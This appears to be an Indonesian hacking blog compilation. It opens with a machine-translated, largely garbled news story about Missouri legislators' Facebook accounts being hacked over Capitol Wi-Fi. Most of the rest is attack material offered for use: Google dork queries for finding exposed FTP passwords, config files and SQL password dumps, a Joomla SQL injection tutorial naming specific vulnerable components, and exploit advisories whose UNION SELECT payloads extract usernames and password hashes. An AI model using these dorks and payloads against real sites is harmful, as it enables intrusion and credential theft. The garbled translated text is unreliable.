Kamis, 26 Mei 2011

Hacker FInternet menargetkan Missouri perakitan iringan dan staf mereka, dan tidak ada yang tahu benar-benar bagaimana atau mengapa.

Karena urusan aldermanic mulai 5 Januari, bulu badan di Kediaman pendukung dari Capitol menerima muncul mereka agar aktualitas account hacked: tiga legislator Partai Republik, satu administrator Demokrat dan satu staf Republik.
Ini adalah yang terbaik, terkonsentrasi petualangan tak terbatas kontes hacking Kediaman telah melihat.
"Jika surat-surat yang benar, ini adalah mempercepat dalam apa yang kita capai di masa lalu," kata Adam Crumbliss, petugas tempat tinggal. "Kami audisi ditambahkan tentang hal itu daripada kami kapan saja miliki."
Meskipun tidak ada yang tepat Tahunan Perseroan telah ditetapkan, contoh hacking menunjuk ke sebuah lubang komputer yang berpotensi luas naungan: Sebuah pengaturan, diakses nirkabel gratis bagi pengunjung tempat tinggal dan anggota legislatif berfungsi sebagai alas diterima dasar untuk hacker, para ahli mengatakan naungan. HUT bulu korban hacking kontemporer telah menyesuaikan diri pengaturan baru-baru ini.
Pada tahun-tahun kontemporer, politisi menerima agresif diadopsi agar dan ditambahkan media lucu sebagai alat hubungan diakses, aplikasi Internet untuk memajukan perilaku mereka dan memperkenalkan dengan konstituen. Jika seorang hacker mengubah pesan cemas dibuat diakses anggota parlemen, para kecelakaan politik dapat aktual dan abadi.
Pada 21 Januari, sebuah cap canggung mengubah adalah memperkenalkan ke folio dapat diklaim magang Rep Donna Lichtenegger, R-Jackson, untuk brace jam.
"Saya sanjungan pelobi (sic) Semua makanan chargeless dan! Yang Anda dapatkan. Pekerjaan ini awesome!" kolom dibaca.
Biasanya, Lichtenegger mengatakan, dia meninggalkan menggunakan agar setiap hari Jumat untuk update kolom tentang kegiatan aldermanic dirinya selama seminggu. Di Capitol, Lichtenegger biasanya mengakses Internet melalui tahunan yang memadai bagi legislator.
Tetapi pada hari itu agar hacked, Lichtenegger login ke Facebook aplikasi Internet nirkabel chargeless DPR diakses.
Beberapa jam kemudian, ia berhasil bahwa tahunannya telah terbongkar. Pada saat itu, tahunan kolom memiliki uang muka dan pendampingan blog politik telah terbaik di cerita.
"Saya suka menyendiri tidak jaminan hal ini, dan sekarang aku apperceive mengapa," katanya.
Dan dia tidak sendirian.
Sekitar tiga minggu yang lalu, magang Rep Dave Schatz, R-Sullivan, melihat bahwa ia dapat cap telah menderita untuk makanan chargeless yang diakui dan kemampuan dari pelobi - tentang identik dengan cap kemudian memperkenalkan ke halaman agar Lichtenegger's.
"Saya tidak apperceive daerah ini maju, dari, jadi saya tidak mengatakan pemusnahan tentang itu," kata Schatz.
Schatz Meskipun tidak menyetujui dirinya seorang ahli komputer, dia mengatakan dia antisipasi sebagai bagaimana ia tahunan hacked.
"Saya apperceive bahwa aku berada di koneksi Wi-Fi dapat diakses, dan itu kembali aku hack," kata Schatz. "Dalam pengaturan Wi-Fi diakses, mereka bisa membanting tulang ke dalam ketiak dan komedi sedikit lelucon."
Dalam semua kasus di mana agar akun yang diakses di DPR, para pemilik rekening telah menyesuaikan diri Kediaman diakses jaringan Wi-Fi. Beberapa anggota legislatif mengatakan mereka menggunakan internet nirkabel dapat diakses tentang eksklusif, dan beberapa mengatakan mereka tidak apperceive bagaimana masuk pengaturan Internet dipertahankan bagi legislator.
Di Senat pendukung dari Capitol, daerah tidak menerima belum ada keluhan dari hacking, semua jaringan internet dimonitor untuk luasan berubah-ubah: Pengaturan terpusat berlabuh diawasi ketat ditambahkan, jaringan dapat diakses, dangkal. Amy Niedergerke, administrator sistem saran komputer untuk Senat, mengatakan anatomi aldermanic terutama terus tab pada kemampuan angkutan gerobak Web yang berbahaya, seperti basil abeyant atau ancaman hacking.
Tapi di Kediaman pendukung gedung Capitol, pengaturan nirkabel diakses pergi unwatched. Crumbliss mengatakan Kediaman ingin memastikan 'individu meninggalkan untuk krim Web kemudian urusan untuk sensor pemerintah atau pengawasan.
"Kami nafsu makan itu menjadi suatu perjanjian, bebas diakses siapa saja yang telah masuk ke dalam," kata Crumbliss.
Yang meninggalkan tidak muncul setelah risiko.
Legislatif Kansas terbiasa antitesis belakang dikonfigurasi diakses jaringan wireless.
"Ada bucking tengah bagaimana berlimpah naungan dugaan Anda menjadi aman, dan warga negara yang tepat untuk muncul dalam dan apperceive tentang dan menerima masuk ke pemerintah mereka," kata Larry Kettlewell, naungan administrator lengkungan saran bagi pemerintah iringan Kansas.
Kettlewell band-bantuan yang diberikan adalah internet nirkabel yang dapat diakses chargeless dan tidak mendambakan password, tetapi dimonitor untuk ancaman oleh tim naungan. Sebagian besar ekologi pengaturan nirkabel dapat lingkup parah - dari hampir tawar-menawar pengaturan otomatis diprogram untuk menganalisis ancaman tertentu, menjadi sekitar $ 50.000 untuk sebuah sistem karyawan-dimonitor, katanya.
Dalam permusuhan beban terkait, Kettlewell mengatakan ia tidak pernah akan menyetujui pengaturan Wi-Fi dapat diakses di Capitol Kansas untuk pergi setelah itu pada atom minimal mirip keamanan.
"Anda tidak menerima cara hidup jika seseorang telah mampu masuk pertambahan ke pengaturan Anda dan sebagian besar penerimaan mereka menerima nasihat untuk Anda kemampuan menyetujui sensitif," katanya. "Jika Anda tidak penasihat apa tindakan yang masuk dan keluar dari jaringan Anda, Anda tidak apperceive jika aksesi Adalah menyakitkan hati saran masuk untuk tujuan membungkuk."
Menurut James Lewis, yang meneliti masalah cybersecurity di Pusat Studi Strategis dan Internasional di Washington, sengit Facebook nasihat dari seorang menangkap nirkabel umumnya merupakan usaha sederhana.
Wi-Fi, katanya, mungkin tidak apa hacker terbiasa masuk rekening agar anggota Missouri tempat tinggal, dalam kasus berlimpah, dia kredibilitas keluar, password tidak sulit untuk menebak.
"Ini tahunan yang memberatkan ke jumlah yang tahu apakah ini adalah sesuatu yg menyusahkan nirkabel atau masalah balasan," kata Lewis. "Itu akan sesuai Anda sebuah abstraksi dari apa naungan yang Anda butuhkan."
ancaman Cybersecurity menerima ditambahkan akut di bulan kontemporer. Mereka menampung urusan dugaan Firesheep bahwa target informasi klandestin tahunan Wi-Fi pengguna.
Firesheep, yang dapat didownload untuk chargeless dari Web, memungkinkan pengguna dengan kemampuan komputer kecil untuk masuk Internet penerimaan rekening rahasia untuk tubuh pada jaringan nirkabel agregat, dan sama-sama menerima pengaruh dari akun tersebut seakan-akan mereka ulang tahun pemilik account.
Untuk Fowler Brown, Firesheep telah disajikan sakit kepala muskil meyakinkan.
Brown adalah arsitek Hotzona, sebuah agregasi yang membantu mengakomodasi internet nirkabel di Capitol Arizona dan memantau pengaturan chargeless biaya.
Firesheep, Brown mengatakan, adalah "aksesi seperti duduk di tempat terbuka rumah Anda dengan antena acicular di rumah Anda, dan Anda tidak akan selalu apperceive itu."
"Firesheep adalah salah satu hal yang takut neraka keluar dari kita dengan menerima menjadi orang Facebook dan password serakah."
Pada jaringan nirkabel dapat diakses Capitol Arizona, Brown mengatakan, penerimaan dipantau untuk kegiatan memprihatinkan, dan legislator yang mengikuti risiko.
"Firesheep adalah menyerahkan password Anda, sehingga nafsu makan Anda capai patuh Anda perhatian mereka sebagai melimpah mungkin," kata Brown.
Di masa lalu, Kediaman Missouri telah bermain-main dengan abstraksi aplikasi pengaturan nirkabel saja berlabuh untuk pengguna diakses, dan itu masih menyisakan keuntungan diakses untuk tubuh yang banding password. Tapi, Crumbliss kata, tubuh tidak terganggu dengan punggung tahunan sebuah balasan yang sesuai bagi setiap orang: Wartawan mengeluh bahwa itu adalah sebuah hambatan bagi pekerjaan mereka, sedangkan pengunjung ke Capitol memulai action login rumit.
Sekarang, sama mengakui Kediaman menawarkan terpisah, membela pengaturan bagi legislator digunakan untuk tugas resmi dalam aksesi ke Internet nirkabel dapat diakses, berlimpah tidak.
Sementara itu, Crumbliss mengatakan ia akan menegur legislator dari risiko yang terkait dengan hidup pada pengaturan nirkabel dan nafsu makan mereka untuk menggunakan internet mereka dipertahankan untuk tugas-tugas akut.
Sementara itu, di atom satu kenalan mutlak telah muncul dari sebuah akun Facebook dikompromikan. Rep Stacey Newman, D-Richmond Heights, yang dapat tahunan ini jauh takut satu hari setelah itu alpha sesi, telah menyesuaikan diri berkenalan untuk memajukan hubungan segar - dalam kehidupan absolut, bukan di Internet.
Setelah audisi ulang tahun terbelakang tahunan yang Lichtenegger's Facebook telah hacked juga, Newman dicapai di luar gang terasa sakit dengan rekan tempat tinggal nya. Dia bergurau bahwa dua menerima membentuk konklaf bipartisan sendiri untuk bertengkar hal-hal hacking-terkait.
Newman mengatakan petualang pelanggaran perlindungan komputer tidak urusan nya.
"Sekarang itu terjadi pada beberapa dari kami di Kediaman -? Mengapa Ia tidak menyelesaikan alpha Anda bertanya-tanya," katanya. "Saya tidak apperceive apa yang harus berbatasan bunyi kaki menapak, tapi aku sebenarnya bingung."

Facebook Saya rentan, Hack Me Please!



Aku punya begitu banyak teman di facebook dan setiap orang dari mereka selalu bertanya mengapa Facebook sucks? Jadi akhirnya saya menunjukkan bahwa facebook adalah sepenuhnya terhadap Anda Keamanan & Privasi dan ada cara yang lebih aman lain dapat terhubung dengan dunia, seperti Twitter, Orkut. Disini kita memiliki Satu lagi link agar rentan, seperti yang ditunjukkan di bawah ini. Hal ini terlihat lucu, tapi YA! Facebook adalah situs yang paling rentan di internet yang digunakan oleh ribuan pengguna jutaaan sehari-hari.

Link : https://www.facebook.com/connect/connect_to_node_error.php?body=I%20am%20vulnerable,%20Please%20Hack%20Me%20!

Daily a new Vulnerability, 100's of Scams Lets have a look on Some of them here :
1.) Police warns - Beware Facebook scams !
2.) New Facebook worm propagating : VERIFY MY ACCOUNT , Video Explanation of code !
3.) New Facebook Scam : WTF I can’t believe you’re in this video !
4.) Facebook new Vulnerability, Lots of Accounts misused for spamming !
5.) Script that gives hackers access to user accounts floods Facebook !
6.) JavaScript hole in Facebook !
7.) Vulnerability in Facebook Email feature Exposed !
8.) Facebook virus spreads via photo album chat messages !
9.) You got owned, Exposure about privacy on facebook !
10) Facebook Vulnerability - Beware of A New XSS on Facebook !
11) Facebook is not Exclusion, XML Vulnerability !

Dimana Risiko:
Salah satu resiko adalah bahwa sejumlah besar orang benar-benar melakukan berhenti menggunakan Facebook sepenuhnya, mungkin karena takut bagaimana data mereka bisa digunakan, tetapi juga karena mereka lelah oleh perubahan konstan. Ini belum terjadi, meskipun banyak kritikus memprediksi bahwa itu akan selama bertahun-tahun. Tapi ada masih bisa menjadi titik kritis, di mana membangun-up isu akhirnya meyakinkan orang untuk meninggalkan sebuah msg.

Risiko lainnya adalah bahwa lembaga dari pemerintah nasional, terutama Amerika Serikat Federal Trade Commission, menetapkan regulasi baru kaku pada perubahan produk apa yang dapat bisa membuat ke depan, sehingga membatasi kemampuannya untuk meningkatkan produk-produknya.

3 Tips terbaik sebelum Anda melakukannya lagi Pencarian Google

Query Google tidak case sensitif: Google tidak peduli apakah Anda tipe query Anda dalam huruf kecil (hacker), uppercase (hacker), kasus unta (hacker), atau psiko-kasus (hacker)-kata tersebut selalu dianggap sama way.This sangat penting ketika you'researching hal-hal seperti listing kode sumber, ketika kasus istilah membawa banyak makna untuk pengecualian satu programmer.The penting adalah kata atau. Ketika digunakan sebagai operator Boolean, atau harus ditulis dalam huruf besar, sebagai ATAU.
Google wildcard: Konsep Google wildcard tidak sama sebagai sebuah konsep programmer tentang wildcard. Kebanyakan menganggap wildcard untuk menjadi baik representasi simbolis dari setiap huruf tunggal (UNIX penggemar mungkin berpikir tentang tanda tanya) atau rangkaian huruf diwakili oleh tanda bintang. Jenis teknik ini disebut berasal. Google wildcard, asterisk
(*), merupakan tidak lebih dari satu kata dalam frase pencarian. Menggunakan tanda bintang di awal atau di akhir kata tidak akan memberikan Anda lebih dari apapun hits menggunakan kata dengan sendirinya.
Google berhak untuk mengabaikan Anda: Google mengabaikan kata-kata umum tertentu, karakter, dan digit tunggal dalam search.These yang kadang-kadang disebut kata-kata berhenti. Ketika Google mengabaikan setiap istilah pencarian, Anda akan diberitahu pada halaman hasil, tepat di bawah kotak pertanyaan. Beberapa kata-kata umum termasuk siapa, dimana, apa,, sebuah, atau. Anehnya, logika untuk pengecualian kata dapat bervariasi dari pencarian untuk mencari

Advanced sandi hacking menggunakan Google - mudah dipelajari, mudah untuk menerapkan

Google adalah teman terbaik Anda ketika datang ke hacking. Raksasa mesin pencari memiliki merangkak banyak data yang dimaksudkan untuk dilindungi oleh webmaster, password butAdvanced hacking menggunakan Google - mudah dipelajari, prompt untuk menyebarkan - theprohack.com sedang dieksploitasi dan ditambang oleh pengguna smart menggunakan Google Dorks. Hari ini saya akan membahas beberapa Dorks praktis yang akan membantu Anda mendapatkan password, database dan direktori rentan. Metodologi dasar tetap Google, sama query menggunakan Dorks khusus dengan parameter yang tepat dan Anda baik untuk pergi. Saya menganggap Anda memiliki pengetahuan dasar Dorks google.
Mari kita mulai, harus kita?
FTP password
ws_ftp.ini adalah file konfigurasi untuk klien win32 populer FTP yang menyimpan nama pengguna, (lemah) password disandikan, situs dan direktori bahwa pengguna dapat menyimpan untuk referensi nanti.

    
intitle: index.of ws_ftp.ini
Anda juga dapat ini dork yang menggunakan "parent directory" untuk menghindari hasil selain daftar direktori

    
filetype: pwd WS_FTP Suami

    
Atau

    
"Index of /" "" "parent directory" ws_ftp.ini
bahkan jika situs atau file telah diambil offlline, Anda masih dapat mencari isi di cache Google menggunakan dork berikut

    
"Cache: www.abc.com / ws_ftp.ini"

    
mana

    
www.abc.com adalah situs yang ingin memeriksa dork untuk.
Sandi WS_FTP menggunakan algoritma enkripsi yang cukup lemah, maka setelah Anda mendapatkan password, Anda dapat mematahkan menggunakan decryptor yang disediakan di sini atau dari sini.
Hacking PHP
Situs dibuat dalam PHP memiliki file yang dikenal sebagai "config.php" yang menyimpan konfigurasi dan username dan password untuk database sql situs itu hosting. Password ini hanya diperlukan sekali per transaksi (yakni ketika login pernah admin atau transaksi dilakukan di tingkat administrator) dan maka akan ditentukan oleh parameter 'require_once' dalam file konfigurasi atau dalam file indeks.

    
intitle: index.of config.php
untuk melihat isi file php

    
intitle: "Index of" phpinfo.php
Anda juga dapat mencoba serangan direktori traversal di php menggunakan dork berikut

    
inurl: download.php = nama file?
jika Anda beruntung, mengganti nama file dengan 'index.php', download, membacanya dan mendapatkan password (petunjuk: jika anda tidak dapat menemukannya, cobalah mencari globals.php).
Karena sebagian besar situs web saat ini menyangkal trik ini, tetapi Anda mungkin mendapatkan beruntung dengan beberapa:) Anda juga mungkin ingin melihat-lihat di Hacking PHP 4.4 website dalam 20 detik
SQL dumps
Kami akan berburu untuk pembuangan password disimpan dalam database SQL, di sini ext: sql menetapkan jenis dump password, e10adc3949ba59abbe56e057f20f883e adalah hash md5 untuk 123456, salah satu orang sandi paling umum terus .. dan dork intext akan mengizinkan Anda untuk mencari di dalam dump.

    
ext: sql intext: intext @ gmail.com: e10adc3949ba59abbe56e057f20f883e

    
ext: sql intext: "INSERT INTO" intext: @ somemail.com intext: password
Ingat anak-anak

   
1. Gunakan penyedia layanan email yang berbeda, gmail pengganti / yahoomail, bukan somemail, atau coba penyedia mail domain kustom.
   
2. Menggunakan ekstensi file yang berbeda.
   
3. Penggunaan berbagai jenis hash, beberapa yang lebih tua mungkin menggunakan MD4 dan beberapa lainnya mungkin menggunakan algoritma enkripsi lainnya menonjol.
   
4. hanya mencampur semuanya dan mencoba kombinasi berbeda:)


Its belum berakhir .. Namun
Sebuah permintaan yang sangat fleksibel dapat digunakan untuk berburu WS_FTP.log yang pada gilirannya dapat memberikan informasi berharga tentang server.

    
+ Htpasswd + WS_FTP.LOG filetype: log
Anda dapat menggantikan "+ htpasswd" untuk "+ FILENAME" & Anda bisa mendapatkan beberapa hasil yang tidak disebutkan sebelum menggunakan pencarian biasa. Anda juga dapat menjelajahi nama file dengan menggunakan kata kunci seperti

    
phpinfo, admin, MySQL, password, htdocs, akar, Cisco, Oracle, IIS, melanjutkan, inc, sql, pengguna, mdb, Frontpage, CMS, backend, https, editor, intranet
Daftar ini berjalan dan terus .. Juga anda cam mencoba dork ini untuk data informasi penambangan sekitar uploader

    
"Allinurl:" some.host.com "WS_FTP.LOG filetype: log"
yang memberitahu anda lebih tentang siapa yang meng-upload file ke situs tertentu, cukup berguna untuk beberapa pengintaian pasif.


Juga .. jika Anda adalah salah satu neraka malas b ** tard, Anda bisa melakukannya dengan menggunakan beberapa software seperti Google Hacks .. tapi ingat, cara manual adalah cara untuk pergi. Saya mungkin telah memasukkan beberapa pertambangan sandi software tertentu, tapi itu akan melumpuhkan imajinasi Anda. Saya recco? pergi pos dengan menggunakan imajinasi Anda dan mengembangkan Dorks Anda sendiri dan pertanyaan.
Saya kira itu sudah cukup untuk saat ini, akan datang dengan berdecak lebih dengan waktu.

Selasa, 24 Mei 2011

Cara Hack Website Joomla? Joomla SQL Injection Contoh: Belajar Joomla Hacking

The probably most common case for hacked Joomla websites is that a SQL injection vulnerability was exploited. A typical URL which is affected by this type of vulnerability looks like this:

index.php?option=com_blabla&category=5&Item=2

Typically the following parameters are vulnerable:
- cat, category, kat, categories, kats, cats
- id, userid, katid, catid
- sometimes also Item, entry, page

You can find out if a parameter is vulnerable when you change its value from e.g. category=5 to category='.

Press enter and look for MySQL errors in the website. If you find one, you might have discovered a SQL inkjection vulnerability.

In order to give you a better understanding and feeling of how vulnerable URLs might look like, I just show you some URLs which are known to be vulnerable (I discovered them):

URL: index.php?option=com_jp_jobs&view=detail&id=1
Vulnerable parameter: id

URL: index.php?option=com_mv_restaurantmenumanager&task=menu_display\
&Venue=XX&mid=XX&Itemid=XX
Vulnerable parameter: mid

URL: index.php?option=com_qpersonel&task=qpListele&katid=2
Vulnerable parameter: katid

URL: index.php?com_pandafminigames&Itemid=&task=myscores&userid=2
Vulnerable parameter: userid

URL: index.php?option=com_joltcard&Itemid=21&task=view&cardID=6
Vulnerable parameter: cardID

URL: index.php?com_bfquiztrial&view=bfquiztrial&catid=1&Itemid=62
Vulnerable parameter: catid

URL: index.php?com_golfcourseguide&view=golfcourses&cid=1&id=79
Vulnerable parameter: id

URL: index.php?option=com_nkc&view=insc&lang=en&gp=10
Vulnerable parameter: gp

Notice how many parameters look familiar to you? Yes, I mentioned them
earlier as well-known parameters which are affected on regular
basis :)

Since every Joomla database contains the same structure (like the same
tables etc.), we know enough to inject a SQL statement:

Example #1:
index.php?option=com_qpersonel&task=qpListele&katid=XX+AND+1=2+UNION+\
SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(\
username, password)--

Example #2:
index.php?option=com_pandafminigames&Itemid=&task=myscores&userid=XX+\
AND+1=2+UNION+SELECT+concat(password),2,concat(password),4,5,6,7,\
8,9,10,11,12--

Example #3:
index.php?option=com_jp_jobs&view=detail&id=1+AND+1=2+UNION+SELECT+\
group_concat(0x503077337220743020743368206330777321,name,username,\
password,email,usertype,0x503077337220743020743368206330777321)--

The selected information will be shown within the website.
Select a username and password from the table and try to crack the
MD5 hash with the help of raindbow tables.

SQL injections in Joomla give us so much freedom as we can get. You can
select everything you want from the database, and if you are lucky,
there are also other tables in the databases which do not belong
to Joomla but still contain some very interesting information.
#####################################
# Title : ChromeMedia SQL Injection Vulnerability
# Author: Kalashinkov3
# Vendor: [www.chromemedia.com]
# Email : kalashinkov3[at]Hotmail[dot].Fr
# Date : 22/05/2011
# Google Dork : intext:"Web Design by ChromeMedia Inc" inurl:*.php?
# Category : PHP [SQli]
#####################################

*_Exploit_*

# http://[localhost]/*/*/article.php?content_id='22
# http://[localhost]/*/*/article.php?content_id=[SQLI]


# http://[localhost]/*/*/details.php?product_id='20
# http://[localhost]/*/*/details.php?product_id=[SQLI]

# all php files "*.php?*_id= " are vulnerable #


^_^ G00d LUCK ALL :=)

======================================
# Greets To : BrOx-dz & all Algerians Hacker'S ;) & All mmembre 1337Day #

Joomla Komponen com_question SQL Injection Vulnerability

###################################################
# |Title : Joomla (com_question) SQL Injection Vulnerability
# |Vendor : http://www.alex-ensdorf.de/
# |Version : Joomla 1.5
# |Date : 15/5/2011
# |Author : NeX HaCkEr
# |Contact : Error_log@hotmail.com
##################################################
# | Exploit :
# | http://localhost/Joomla/index.php/?option=com_question&catID=[SQL]
# | http://localhost/Joomla/index.php/?option=com_question&catID=21' and+1=0 union all
# | select 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20
##################################################
# | Demo:
# | http://site.com/index.php/?option=com_question&catID=21' and+1=0 union all select # | 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20
##################################################
# | Greetz :
# | Dr.KAsBeR & DaShEr & MaFiA & WeeD
##################################################